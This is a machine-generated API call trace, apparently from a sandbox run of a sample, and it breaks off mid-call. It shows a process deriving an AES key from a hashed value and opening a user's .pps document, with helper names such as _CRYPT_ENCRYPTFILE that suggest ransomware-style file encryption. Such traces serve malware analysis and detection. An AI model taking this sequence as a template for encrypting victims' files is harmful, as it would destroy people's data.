[0178.258] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\isuTz.pps\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0178.258] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\isuTz.pps\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0178.258] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\isuTz.pps\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0178.258] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\isuTz.pps\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0178.258] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\isuTz.pps\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0178.258] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Jn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\isuTz.pps\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0178.258] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="n0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\isuTz.pps\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0178.258] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\isuTz.pps\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0178.258] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\isuTz.pps\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0178.258] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="S HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\isuTz.pps\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0178.258] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\isuTz.pps\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0178.258] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\isuTz.pps\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0178.258] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ALPmcxz\\Documents\\x6khSA9uDUZMBxf\\isuTz.pps\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0178.258] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LPmcxz\\Documents\\x6khSA9uDUZMBxf\\isuTz.pps\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0178.258] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Pmcxz\\Documents\\x6khSA9uDUZMBxf\\isuTz.pps\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0178.258] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mcxz\\Documents\\x6khSA9uDUZMBxf\\isuTz.pps\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0178.259] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cxz\\Documents\\x6khSA9uDUZMBxf\\isuTz.pps\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0178.259] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xz\\Documents\\x6khSA9uDUZMBxf\\isuTz.pps\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0178.259] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="z\\Documents\\x6khSA9uDUZMBxf\\isuTz.pps\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0178.259] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Documents\\x6khSA9uDUZMBxf\\isuTz.pps\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0178.259] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Documents\\x6khSA9uDUZMBxf\\isuTz.pps\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0178.259] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ocuments\\x6khSA9uDUZMBxf\\isuTz.pps\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0178.259] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cuments\\x6khSA9uDUZMBxf\\isuTz.pps\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0178.259] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="uments\\x6khSA9uDUZMBxf\\isuTz.pps\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0178.259] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ments\\x6khSA9uDUZMBxf\\isuTz.pps\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0178.259] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ents\\x6khSA9uDUZMBxf\\isuTz.pps\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0178.259] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="nts\\x6khSA9uDUZMBxf\\isuTz.pps\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0178.259] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ts\\x6khSA9uDUZMBxf\\isuTz.pps\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0178.259] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\x6khSA9uDUZMBxf\\isuTz.pps\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0178.259] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\x6khSA9uDUZMBxf\\isuTz.pps\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0178.259] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="x6khSA9uDUZMBxf\\isuTz.pps\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0178.259] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="6khSA9uDUZMBxf\\isuTz.pps\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0178.259] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="khSA9uDUZMBxf\\isuTz.pps\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0178.259] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="hSA9uDUZMBxf\\isuTz.pps\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0178.259] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SA9uDUZMBxf\\isuTz.pps\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0178.259] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="A9uDUZMBxf\\isuTz.pps\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0178.259] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="9uDUZMBxf\\isuTz.pps\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0178.259] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="uDUZMBxf\\isuTz.pps\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0178.259] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DUZMBxf\\isuTz.pps\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0178.259] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="UZMBxf\\isuTz.pps\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0178.259] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ZMBxf\\isuTz.pps\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0178.260] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MBxf\\isuTz.pps\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0178.260] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Bxf\\isuTz.pps\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0178.260] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xf\\isuTz.pps\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0178.260] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="f\\isuTz.pps\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0178.260] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\isuTz.pps\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0178.260] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="isuTz.pps\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0178.260] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0178.260] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0178.260] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0178.260] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0178.260] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0178.260] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ps", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0178.260] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="pps", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0178.260] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".pps", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0178.260] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0178.260] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0178.260] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0178.260] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0178.260] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0178.260] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\isuTz.pps", lpFindFileData=0x87edb8 | out: lpFindFileData=0x87edb8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4787dab0, ftCreationTime.dwHighDateTime=0x1d5e1ba, ftLastAccessTime.dwLowDateTime=0x2d78f050, ftLastAccessTime.dwHighDateTime=0x1d5e025, ftLastWriteTime.dwLowDateTime=0x2d78f050, ftLastWriteTime.dwHighDateTime=0x1d5e025, nFileSizeHigh=0x0, nFileSizeLow=0x9094, dwReserved0=0x87ef08, dwReserved1=0x8a7560, cFileName="isuTz.pps", cAlternateFileName="")) returned 0x90af58 [0178.261] FindClose (in: hFindFile=0x90af58 | out: hFindFile=0x90af58) returned 1 [0178.261] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0178.261] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0178.261] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0178.261] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0178.261] PeekMessageW (in: lpMsg=0x87ecf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ecf4) returned 0 [0178.261] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0178.261] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x74f20000 [0178.261] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0178.261] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0178.261] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0178.262] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0178.262] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0178.262] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0178.262] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0178.262] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0178.262] PeekMessageW (in: lpMsg=0x87eac4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eac4) returned 0 [0178.262] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0178.262] CryptAcquireContextA (in: phProv=0x87ea98, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x87ea98*=0x9c0b78) returned 1 [0178.264] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0178.264] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0178.264] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0178.264] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0178.264] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0178.264] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0178.264] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0178.264] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0178.264] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0178.264] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0178.265] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0178.265] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0178.265] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0178.265] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0178.265] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0178.265] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0178.265] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0178.265] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0178.265] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0178.265] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0178.265] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0178.265] PeekMessageW (in: lpMsg=0x87e7c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7c4) returned 0 [0178.265] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0178.265] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0178.265] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0178.265] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0178.265] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0178.265] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0178.265] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0178.265] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0178.266] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0178.266] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0178.266] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0178.266] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0178.266] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0178.266] CryptCreateHash (in: hProv=0x9c0b78, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x87e808 | out: phHash=0x87e808) returned 1 [0178.266] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0178.266] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0178.266] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0178.266] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0178.266] CharLowerBuffW (in: lpsz="byte[25]", cchLength=0x8 | out: lpsz="byte[25]") returned 0x8 [0178.266] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0178.266] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0178.266] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0178.266] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0178.266] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0178.266] CryptHashData (hHash=0x90ae18, pbData=0x8dec90, dwDataLen=0x19, dwFlags=0x1) returned 1 [0178.266] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0178.267] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0178.267] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0178.267] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0178.267] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0178.267] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0178.267] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0178.267] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0178.267] CryptDeriveKey (in: hProv=0x9c0b78, Algid=0x660e, hBaseData=0x90ae18, dwFlags=0x1, phKey=0x87e808 | out: phKey=0x87e808*=0x90af18) returned 1 [0178.267] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0178.267] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0178.267] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0178.267] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0178.267] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0178.267] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0178.267] PeekMessageW (in: lpMsg=0x87e944, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e944) returned 0 [0178.267] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0178.267] CryptDestroyHash (hHash=0x90ae18) returned 1 [0178.267] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0178.267] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0178.268] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0178.268] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0178.268] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0178.269] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\isuTz.pps" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\x6khsa9uduzmbxf\\isutz.pps"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0178.269] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0178.269] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87ef40 | out: lpNewFilePointer=0x0) returned 1 [0178.269] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0178.269] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3f0 [0178.269] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2678 [0178.269] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7f8 | out: hHeap=0x8a0000) returned 1 [0178.269] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, 